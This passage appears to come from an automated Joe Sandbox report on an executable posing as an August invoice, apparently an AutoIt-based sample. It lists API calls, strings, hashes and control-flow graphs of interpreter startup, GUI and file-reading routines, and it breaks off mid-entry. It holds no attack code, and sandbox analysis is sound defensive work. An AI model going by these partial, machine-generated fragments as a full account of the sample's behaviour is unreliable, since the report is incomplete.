                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: IsThemeActive$uxtheme.dll
                                                          • API String ID: 2574300362-3542929980
                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                          • API String ID: 1762048999-758534266
                                                          • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                          • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,00000104,?), ref: 00401F4C
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,00000104), ref: 00428B5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe$CMDLINE$CMDLINERAW
                                                          • API String ID: 3948761352-1463227944
                                                          • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                          • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                          • String ID: D)E$D)E$FILE
                                                          • API String ID: 3888824918-361185794
                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                          • _wcscat.LIBCMT ref: 00427541
                                                          • _wcslen.LIBCMT ref: 00427551
                                                          • _wcslen.LIBCMT ref: 00427562
                                                          • _wcscat.LIBCMT ref: 0042757C
                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                          • String ID: Include$\
                                                          • API String ID: 3173733714-3429789819
                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                          Control-flow Graph

                                                          APIs
                                                          • _fseek.LIBCMT ref: 0045292B
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                          • _fseek.LIBCMT ref: 004529BF
                                                          • _malloc.LIBCMT ref: 004529CA
                                                          • _malloc.LIBCMT ref: 004529D6
                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                          • _free.LIBCMT ref: 00452A17
                                                          • _free.LIBCMT ref: 00452A20
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                          • String ID:
                                                          • API String ID: 1255752989-0
                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                          • ImageList_ReplaceIcon.COMCTL32(00AC0198,000000FF,00000000), ref: 00410552
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AC0198,000000FF,00000000), ref: 00410552
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _malloc
                                                          • String ID: Default
                                                          • API String ID: 1579825452-753088835
                                                          • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                          • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1972 40f640 1970->1972 1973 40f642-40f650 1972->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1973 1990 425d11 1988->1990 1989->1975 1990->1985 1991->1968
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                          • String ID: AU3!$EA06
                                                          • API String ID: 1268643489-2658333250
                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2017 4011af 2010->2017 2011->2009 2012->2001 2014 401225-42b06d call 468b0e 2012->2014 2018 401163-401166 2013->2018 2019 42b01d-42b024 2013->2019 2014->2009 2017->2001 2025 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2017->2025 2026 4011db-401202 SetTimer RegisterWindowMessageW 2017->2026 2020 42afe9-42b018 call 40f190 call 401a50 2018->2020 2021 40116c-401172 2018->2021 2019->2000 2027 42b02a-42b033 call 4370f4 2019->2027 2020->2000 2021->2001 2028 401174-42afde call 45fd57 2021->2028 2026->2009 2033 401204-401216 CreatePopupMenu 2026->2033 2027->2000 2028->2000 2045 42afe4 2028->2045 2045->2009
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                          • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                          APIs
                                                          • _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
